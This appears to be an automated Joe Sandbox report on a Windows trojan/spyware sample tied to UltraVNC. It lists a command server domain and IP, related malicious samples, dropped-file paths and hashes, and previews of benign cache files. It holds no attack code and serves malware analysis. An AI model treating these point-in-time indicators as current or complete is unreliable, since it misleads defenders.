                          NameIPActiveMaliciousAntivirus DetectionReputation
                          tbdcic.info
                          194.190.152.201
                          truefalse
                            high
                            bg.microsoft.map.fastly.net
                            199.232.214.172
                            truefalse
                              high
                              x1.i.lencr.org
                              unknown
                              unknownfalse
                                high
                                NameSourceMaliciousAntivirus DetectionReputation
                                http://www.uvnc.commSRW5AfJpC.exe, 00000000.00000003.2115814027.000000000246B000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002930000.00000004.00000020.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000000.2215667944.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295744308.00007FF74027C000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drfalse
                                  high
                                  http://x1.i.lencr.org/2D85F72862B55C4EADD9E66E06947F3D0.12.drfalse
                                    high
                                    http://java.sun.com/update/1.4.2/jinstall-1_4-windows-i586.cab#Version=1mSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drfalse
                                      high
                                      http://www.uvnc.comopenhttp://forum.uvnc.comnetmSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drfalse
                                        unknown
                                        http://crl.thawte.com/ThawteTimestampingCA.crl0mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drfalse
                                          high
                                          http://java.sun.com/products/plugin/index.html#downloadmSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drfalse
                                            high
                                            http://forum.uvnc.commSRW5AfJpC.exe, 00000000.00000003.2115476350.0000000002765000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000013.00000002.3977563809.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000013.00000000.2215399412.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000002.2298716392.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000017.00000000.2295669482.00007FF7400D9000.00000002.00000001.01000000.00000007.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drfalse
                                              unknown
                                              http://ocsp.thawte.com0mSRW5AfJpC.exe, 00000000.00000003.2115814027.0000000002479000.00000004.00001000.00020000.00000000.sdmp, mSRW5AfJpC.exe, 00000000.00000003.2115476350.000000000293E000.00000004.00000020.00020000.00000000.sdmp, Fgyxfc.Qnwi4I.0.dr, Fgyxfc.Qnwi4I.2.dr, sync_browser.exe.6.drfalse
                                                high
                                                • No. of IPs < 25%
                                                • 25% < No. of IPs < 50%
                                                • 50% < No. of IPs < 75%
                                                • 75% < No. of IPs
                                                IPDomainCountryFlagASNASN NameMalicious
                                                194.190.152.201
                                                tbdcic.infoRussian Federation
                                                41615RSHB-ASRUfalse
                                                Joe Sandbox version:41.0.0 Charoite
                                                Analysis ID:1579875
                                                Start date and time:2024-12-23 13:36:25 +01:00
                                                Joe Sandbox product:CloudBasic
                                                Overall analysis duration:0h 7m 47s
                                                Hypervisor based Inspection enabled:false
                                                Report type:full
                                                Cookbook file name:default.jbs
                                                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                Run name:Run with higher sleep bypass
                                                Number of analysed new started processes analysed:31
                                                Number of new started drivers analysed:0
                                                Number of existing processes analysed:0
                                                Number of existing drivers analysed:0
                                                Number of injected processes analysed:0
                                                Technologies:
                                                • HCA enabled
                                                • EGA enabled
                                                • AMSI enabled
                                                Analysis Mode:default
                                                Analysis stop reason:Timeout
                                                Sample name:mSRW5AfJpC.exe
                                                renamed because original name is a hash value
                                                Original Sample Name:41a6e70e243bcded4033dc8050773fd3bd8870da995c4df2cba861bd2492e88c.exe
                                                Detection:MAL
                                                Classification:mal84.troj.spyw.evad.winEXE@56/60@2/1
                                                EGA Information:
                                                • Successful, ratio: 100%
                                                HCA Information:Failed
                                                Cookbook Comments:
                                                • Found application associated with file extension: .exe
                                                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                                • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                • Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 54.224.241.105, 18.213.11.84, 50.16.47.176, 34.237.241.83, 23.195.39.65, 199.232.214.172, 184.30.20.134, 23.32.239.56, 2.19.198.27, 13.107.246.63, 23.218.208.109, 52.6.155.20, 4.245.163.56
                                                • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, fs.microsoft.com, e8652.dscx.akamaiedge.net, otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, e4578.dscb.akamaiedge.net, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, acroipm2.adobe.com, fe3cr.delivery.mp.microsoft.com, ssl.adobe.com.edgekey.net, ocsp.digicert.com, armmf.adobe.com, ssl-delivery.adobe.com.edgekey.net, a122.dscd.akamai.net, geo2.adobe.com, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net
                                                • Not all processes where analyzed, report is missing behavior information
                                                • Report size exceeded maximum capacity and may have missing behavior information.
                                                • Report size exceeded maximum capacity and may have missing disassembly code.
                                                • Report size getting too big, too many NtOpenKeyEx calls found.
                                                • Report size getting too big, too many NtQueryValueKey calls found.
                                                • VT rate limit hit for: mSRW5AfJpC.exe
                                                No simulations
                                                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                194.190.152.2017q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                  T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                    Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      tbdcic.info7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                      • 194.190.152.201
                                                      T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                      • 194.190.152.201
                                                      Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                      • 194.190.152.201
                                                      bg.microsoft.map.fastly.netq8b3OisMC4.dllGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                      • 199.232.210.172
                                                      T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                      • 199.232.210.172
                                                      Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                      • 199.232.210.172
                                                      eszstwQPwq.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                      • 199.232.210.172
                                                      0vM02qWRT9.ps1Get hashmaliciousLockBit ransomware, MetasploitBrowse
                                                      • 199.232.210.172
                                                      #U5b89#U88c5#U52a9#U624b_2.0.8.exeGet hashmaliciousUnknownBrowse
                                                      • 199.232.214.172
                                                      fiFdIrd.txt.jsGet hashmaliciousUnknownBrowse
                                                      • 199.232.210.172
                                                      5XXofntDiN.exeGet hashmaliciousLummaCBrowse
                                                      • 199.232.210.172
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      RSHB-ASRU7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                      • 194.190.152.201
                                                      T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                      • 194.190.152.201
                                                      Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                      • 194.190.152.201
                                                      Scan_Zakaz_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                      • 194.190.152.129
                                                      Scan_Zayavlenie_1416-02-24_13-02-2024.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                      • 194.190.152.129
                                                      document.jpg.lnkGet hashmaliciousReverse SSHBrowse
                                                      • 194.190.152.129
                                                      tiago.exeGet hashmaliciousReverse SSHBrowse
                                                      • 194.190.152.129
                                                      0EZ9Ho3Ruc.exeGet hashmaliciousRedLineBrowse
                                                      • 194.190.152.148
                                                      Paralysis Hack.exeGet hashmaliciouszgRATBrowse
                                                      • 194.190.153.137
                                                      No context
                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                      C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Ivn55G.PqhJnU7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                        T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                          Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                            C:\Users\user\AppData\Local\Temp\7ZipSfx.000\Fgyxfc.Qnwi4I7q551ugrWe.exeGet hashmaliciousUltraVNCBrowse
                                                              T8xrZb7nBL.exeGet hashmaliciousUltraVNCBrowse
                                                                Olz7TmvkEW.exeGet hashmaliciousUltraVNCBrowse
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):291
                                                                  Entropy (8bit):5.205481673456694
                                                                  Encrypted:false
                                                                  SSDEEP:6:fCcM+q2P92nKuAl9OmbnIFUt8ncZmw+nXMVkwO92nKuAl9OmbjLJ:U+v4HAahFUt8c/+cV5LHAaSJ
                                                                  MD5:839ECAE182A0DB7C5B9A187954F494C1
                                                                  SHA1:7E993CB669F8661C70A1F63FB9AF3FADA155E21B
                                                                  SHA-256:CF086064D29AB51BDFCE177403558FCF1A10D598BF4D90DBAC4E2C6E1B17EC65
                                                                  SHA-512:6B9FBEB718EAFF5B189696C901A6FAC25EFE27BFF82FA3E3322FC6815829D27614D62F193D33FB97CD43DC11651C84BDA91501FFE3DE2A3CB87B8BFF7E64E7A6
                                                                  Malicious:false
                                                                  Preview:2024/12/23-07:37:26.998 51c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:37:27.002 51c Recovering log #3.2024/12/23-07:37:27.002 51c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):291
                                                                  Entropy (8bit):5.205481673456694
                                                                  Encrypted:false
                                                                  SSDEEP:6:fCcM+q2P92nKuAl9OmbnIFUt8ncZmw+nXMVkwO92nKuAl9OmbjLJ:U+v4HAahFUt8c/+cV5LHAaSJ
                                                                  MD5:839ECAE182A0DB7C5B9A187954F494C1
                                                                  SHA1:7E993CB669F8661C70A1F63FB9AF3FADA155E21B
                                                                  SHA-256:CF086064D29AB51BDFCE177403558FCF1A10D598BF4D90DBAC4E2C6E1B17EC65
                                                                  SHA-512:6B9FBEB718EAFF5B189696C901A6FAC25EFE27BFF82FA3E3322FC6815829D27614D62F193D33FB97CD43DC11651C84BDA91501FFE3DE2A3CB87B8BFF7E64E7A6
                                                                  Malicious:false
                                                                  Preview:2024/12/23-07:37:26.998 51c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/23-07:37:27.002 51c Recovering log #3.2024/12/23-07:37:27.002 51c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):338
                                                                  Entropy (8bit):5.1628517052993415
                                                                  Encrypted:false
                                                                  SSDEEP:6:eBjyq2P92nKuAl9Ombzo2jMGIFUt8n91Zmw+nrRkwO92nKuAl9Ombzo2jMmLJ:jv4HAa8uFUt891/+d5LHAa8RJ
                                                                  MD5:11BA3AE7E483A7F0375CE949B966CCF3
                                                                  SHA1:6EAD4D00F6D8EFC624032BE68C6F2DD4F06A5C5F
                                                                  SHA-256:982703FB93CFACC84937FDBC738C84AEB36C7A9637E7695F04CE3965C02DA4B6
                                                                  SHA-512:734E31024DFDD3AFBAF045EADC41309821B5BD128DFC5B536FF270005994A457F443496138EEB8AB92AD71DCBA86808ADB803075D529D058D2B409BFAB3DDD3F
                                                                  Malicious:false
                                                                  Preview:2024/12/23-07:37:27.085 1c50 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:37:27.087 1c50 Recovering log #3.2024/12/23-07:37:27.087 1c50 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):338
                                                                  Entropy (8bit):5.1628517052993415
                                                                  Encrypted:false
                                                                  SSDEEP:6:eBjyq2P92nKuAl9Ombzo2jMGIFUt8n91Zmw+nrRkwO92nKuAl9Ombzo2jMmLJ:jv4HAa8uFUt891/+d5LHAa8RJ
                                                                  MD5:11BA3AE7E483A7F0375CE949B966CCF3
                                                                  SHA1:6EAD4D00F6D8EFC624032BE68C6F2DD4F06A5C5F
                                                                  SHA-256:982703FB93CFACC84937FDBC738C84AEB36C7A9637E7695F04CE3965C02DA4B6
                                                                  SHA-512:734E31024DFDD3AFBAF045EADC41309821B5BD128DFC5B536FF270005994A457F443496138EEB8AB92AD71DCBA86808ADB803075D529D058D2B409BFAB3DDD3F
                                                                  Malicious:false
                                                                  Preview:2024/12/23-07:37:27.085 1c50 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/23-07:37:27.087 1c50 Recovering log #3.2024/12/23-07:37:27.087 1c50 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):508
                                                                  Entropy (8bit):5.047195090775108
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                  MD5:70321A46A77A3C2465E2F031754B3E06
                                                                  SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                  SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                  SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):508
                                                                  Entropy (8bit):5.047195090775108
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                  MD5:70321A46A77A3C2465E2F031754B3E06
                                                                  SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                  SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                  SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:dropped
                                                                  Size (bytes):508
                                                                  Entropy (8bit):5.047195090775108
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sqnT/sBdOg2HXcaq3QYiubxnP7E4TfF+:Y2sRdsgTAdMHW3QYhbxP7np+
                                                                  MD5:70321A46A77A3C2465E2F031754B3E06
                                                                  SHA1:5E7E713285D36F12ACFC68A34D8A34FD33C96B34
                                                                  SHA-256:344DA48DA0F9A5CC258E10D6C28086B7718CBE596CDC3D7A2A61C8F5FD781248
                                                                  SHA-512:E885342B270FE3D538F17F8F80B9ED061B30EE55624177BD81F5C65C033160D71559D60872BC0F99C0C93FAE29F9D09FD5042B68D83CD538154D1335BAC8205D
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13340988966329963","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":144691},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:JSON data
                                                                  Category:modified
                                                                  Size (bytes):508
                                                                  Entropy (8bit):5.049595250123284
                                                                  Encrypted:false
                                                                  SSDEEP:12:YH/um3RA8sq7msBdOg2HSgcaq3QYiubxnP7E4TfF+:Y2sRdsCdMHSL3QYhbxP7np+
                                                                  MD5:EB764BE1D8D595C8BB167B67CB9E8688
                                                                  SHA1:D3C0E5EE044797EDE653F82391A632FA3F9B7343
                                                                  SHA-256:6251E339AC071F85C63546710DB29700546E7EFC386F05056C35703EE336AF3D
                                                                  SHA-512:F7A46A31EDDCB435D06F220C14D56E530052377A8302A15630D823CC3955E1A1C9AFFA14B77AC10B5C0636A846F5B7D1C3CC1D17900D547AE47B02F5E8845122
                                                                  Malicious:false
                                                                  Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13379517455315922","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":774382},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.5","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G","CAYSABiAgICA+P////8B":"Offline"}}}
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):4099
                                                                  Entropy (8bit):5.239246320563115
                                                                  Encrypted:false
                                                                  SSDEEP:96:QqBpCqGp3Al+NehBmkID2w6bNMhugoKTNY+No/KTNcygLPGLLUVB/+L:rBpJGp3AoqBmki25ZEVoKTNY+NoCTNLL
                                                                  MD5:0D2EFE01099EB88ED1702787A71DC6A3
                                                                  SHA1:9F7F75ED4E2838AD2E59F795F132F4028CAFD398
                                                                  SHA-256:0D2D72832B56D057C4A21CC533E29C43EF5144731D2704CA6995397F9CDBFB5B
                                                                  SHA-512:63B4037E170E50119E28064007D75EB41D4AAEC4E4CD8D7ABB4EC5ED9AA2A8885874CFE2911241DF48BBFBD772CC215DDD09D38344A11A65AF8E0751C274FD7A
                                                                  Malicious:false
                                                                  Preview:*...#................version.1..namespace-.1a.o................next-map-id.1.Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/.0.K..r................next-map-id.2.Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/.1.m.Fr................next-map-id.3.Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.2.8.o................next-map-id.4.Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/.3.A-N^...............Pnamespace-047a745d_5c98_4926_b446_942fb948d072-https://rna-resource.acrobat.com/-j..^...............Pnamespace-bc60f291_faa7_4492_8b22_e186b4ce62c1-https://rna-resource.acrobat.com/[.|.a...............Snamespace-bdf2fbfe_e08b_407d_8a81_9a6094e373a0-https://rna-v2-resource.acrobat.com/....a...............Snamespace-24b9c7f4_3e31_4d11_a607_ac91d6485c9e-https://rna-v2-resource.acrobat.com/.W.@o................next-map-id.5.Pnamespace-8fb46ac3_c992_47ca_bb04_
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):326
                                                                  Entropy (8bit):5.181806206597494
                                                                  Encrypted:false
                                                                  SSDEEP:6:5lyq2P92nKuAl9OmbzNMxIFUt8jNL1Zmw+jDURkwO92nKuAl9OmbzNMFLJ:5Iv4HAa8jFUt8pL1/+fU5LHAa84J
                                                                  MD5:B3B38E9FBA8BD1D2BA123D1E7FF11173
                                                                  SHA1:00D096516E7A07FDE7977727DC55152FFFF2AA6D
                                                                  SHA-256:FBBB202CE9299A2D0A7002C2DD8A7378B9595B51F4F64F311D5F4AF349E950D1
                                                                  SHA-512:E3A2BC22F81B1C1F76BBDDDC8E07DEA5D01D1384C7FA45206A8633737BE5318BFAC7DDCFE93668738E517397950EA7396646BACEBEB7767F065075E574FFFD45
                                                                  Malicious:false
                                                                  Preview:2024/12/23-07:37:27.389 1c50 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:37:27.403 1c50 Recovering log #3.2024/12/23-07:37:27.442 1c50 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):326
                                                                  Entropy (8bit):5.181806206597494
                                                                  Encrypted:false
                                                                  SSDEEP:6:5lyq2P92nKuAl9OmbzNMxIFUt8jNL1Zmw+jDURkwO92nKuAl9OmbzNMFLJ:5Iv4HAa8jFUt8pL1/+fU5LHAa84J
                                                                  MD5:B3B38E9FBA8BD1D2BA123D1E7FF11173
                                                                  SHA1:00D096516E7A07FDE7977727DC55152FFFF2AA6D
                                                                  SHA-256:FBBB202CE9299A2D0A7002C2DD8A7378B9595B51F4F64F311D5F4AF349E950D1
                                                                  SHA-512:E3A2BC22F81B1C1F76BBDDDC8E07DEA5D01D1384C7FA45206A8633737BE5318BFAC7DDCFE93668738E517397950EA7396646BACEBEB7767F065075E574FFFD45
                                                                  Malicious:false
                                                                  Preview:2024/12/23-07:37:27.389 1c50 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/23-07:37:27.403 1c50 Recovering log #3.2024/12/23-07:37:27.442 1c50 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                  File Type:PC bitmap, Windows 3.x format, 110 x -152 x 32, cbSize 66934, bits offset 54
                                                                  Category:dropped
                                                                  Size (bytes):66934
                                                                  Entropy (8bit):2.436424201832609
                                                                  Encrypted:false
                                                                  SSDEEP:384:kkjiDp0Pogvn5pgqlzaekiqtyQqdRslkdMCC/J0Xum3O5JMZ5lQnsN:kkjcp0GhekH1qv7Jis/3zN
                                                                  MD5:EDF4BC620FE407C6970CDAF5585ADE74
                                                                  SHA1:FF838C5205409B571B5FA183F69EEAAE321F9AE6
                                                                  SHA-256:9ADA9F269BC6944820567EE88B25DAF845BB152B8FA8AB2B49327371AA056234
                                                                  SHA-512:84CB20C3B5FC59B2ACA0402F262A52A1BEDCE267D29E57BE2FA16F96437C13CC60375FFD12BC71BDA2297E5C53F4FBE9747CC86119A3CBE4260D14694499F210
                                                                  Malicious:false
                                                                  Preview:BMv.......6...(...n...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                  Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                  File Type:Certificate, Version=3
                                                                  Category:dropped
                                                                  Size (bytes):1391
                                                                  Entropy (8bit):7.705940075877404
                                                                  Encrypted:false
                                                                  SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                  MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                  SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                  SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                  SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                  Malicious:false
